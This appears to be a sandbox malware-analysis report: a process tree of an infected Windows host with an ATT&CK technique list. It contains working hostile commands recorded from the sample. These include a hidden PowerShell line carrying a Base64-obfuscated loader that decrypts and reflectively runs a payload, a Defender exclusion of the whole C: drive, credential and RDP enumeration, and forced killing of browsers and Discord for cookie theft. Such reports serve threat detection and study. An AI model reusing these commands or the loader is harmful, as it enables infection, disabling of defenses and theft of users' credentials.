        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10912 -s 600
        7⤵
        Program crash
        
        PID:11452
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10416861121\5ym0ZYg.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:11564
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10416861121\5ym0ZYg.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:11648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        
        PID:11760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:12920
    - - C:\Users\Admin\AppData\Local\Temp\10416870101\44cdc87f9e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416870101\44cdc87f9e.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:7432
    - - C:\Users\Admin\AppData\Local\Temp\10416890101\captcha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416890101\captcha.exe"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:12216
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_718592000.txt\""
        6⤵
        NTFS ADS
        
        PID:1832
      - C:\Windows\system32\net.exe
        
        "net" statistics workstation
        6⤵
        
        PID:6452
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 statistics workstation
        7⤵
        
        PID:10444
      - C:\Windows\system32\vaultcmd.exe
        
        "vaultcmd" /list
        6⤵
        
        PID:10208
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        6⤵
        
        PID:10036
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8664
        
        C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        7⤵
        
        PID:8100
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:8348
      - C:\Windows\system32\certutil.exe
        
        "certutil" -store My
        6⤵
        
        PID:8184
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:2620
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FO CSV /NH
        6⤵
        Enumerates processes with tasklist
        
        PID:6828
      - C:\Windows\system32\certutil.exe
        
        "certutil" -store -user My
        6⤵
        
        PID:7284
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6320
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:6368
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:7664
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:8320
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:8608
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
        6⤵
        Command and Scripting Interpreter: PowerShell
        Hide Artifacts: Ignore Process Interrupts
        
        PID:8772
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:9172
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        6⤵
        
        PID:9480
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list:TERMSRV/69.48.201.74
        6⤵
        
        PID:9612
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:9688
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:10972
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:10996
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM msedge.exe
        6⤵
        Kills process with taskkill
        
        PID:4348
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:11416
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM brave.exe
        6⤵
        
        PID:11532
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM opera.exe
        6⤵
        Kills process with taskkill
        
        PID:11636
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:11808
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM vivaldi.exe
        6⤵
        Kills process with taskkill
        
        PID:11916
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM firefox.exe
        6⤵
        
        PID:12708
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:12724
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:12940
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM dragon.exe
        6⤵
        Kills process with taskkill
        
        PID:12948
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM maxthon.exe
        6⤵
        Kills process with taskkill
        
        PID:13132
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:6772
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM uc_browser.exe
        6⤵
        Kills process with taskkill
        
        PID:6652
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM slimjet.exe
        6⤵
        
        PID:7460
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        
        PID:7000
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM cent_browser.exe
        6⤵
        Kills process with taskkill
        
        PID:4408
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM epic.exe
        6⤵
        Kills process with taskkill
        
        PID:4484
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        6⤵
        
        PID:1108
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM torch.exe
        6⤵
        
        PID:2264
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM Discord.exe
        6⤵
        Kills process with taskkill
        
        PID:2184
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM whale.exe
        6⤵
        
        PID:5636
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordCanary.exe
        6⤵
        Kills process with taskkill
        
        PID:5276
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM 360browser.exe
        6⤵
        
        PID:5520
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordPTB.exe
        6⤵
        Kills process with taskkill
        
        PID:428
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM qqbrowser.exe
        6⤵
        
        PID:6332
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordDevelopment.exe
        6⤵
        Kills process with taskkill
        
        PID:1728
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM browser.exe
        6⤵
        Kills process with taskkill
        
        PID:5140
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        6⤵
        
        PID:7848
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        6⤵
        Kills process with taskkill
        
        PID:964
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM brave.exe
        6⤵
        Kills process with taskkill
        
        PID:4528
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM opera.exe
        6⤵
        
        PID:7676
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM vivaldi.exe
        6⤵
        
        PID:1068
    - - C:\Users\Admin\AppData\Local\Temp\10416900101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416900101\7IIl2eE.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:8508
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:9112
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:11284
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        
        PID:11308
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:11644
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        
        PID:11668
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        7⤵
        
        PID:11900
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        7⤵
        
        PID:11920
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        7⤵
        
        PID:12268
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        7⤵
        
        PID:12332
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        7⤵
        
        PID:12440
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        7⤵
        
        PID:12560
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        
        PID:12604
    - - C:\Users\Admin\AppData\Local\Temp\10416910101\XOPPRUc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416910101\XOPPRUc.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:10760
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:10780
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:10796
    - - C:\Users\Admin\AppData\Local\Temp\10416920101\h8NlU62.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416920101\h8NlU62.exe"
        5⤵
        
        PID:12292
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:12360
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:12376
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:12400
    - - C:\Users\Admin\AppData\Local\Temp\10416930101\f01c408210.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416930101\f01c408210.exe"
        5⤵
        
        PID:7340
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2h3853.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2h3853.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:2172
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:4784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
  2⤵
  PID:5244

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3320

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4340

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:7556

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 10912 -ip 10912
1⤵
PID:11392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{6de22b4c-aeec-4d5a-ae91-5a30501945f4}\42bdb713-0053-4a10-9bb0-c040d5ebd6b9.cmd"1
1⤵
PID:12944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Safe Mode Boot

T1562.009

Modify Authentication Process

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion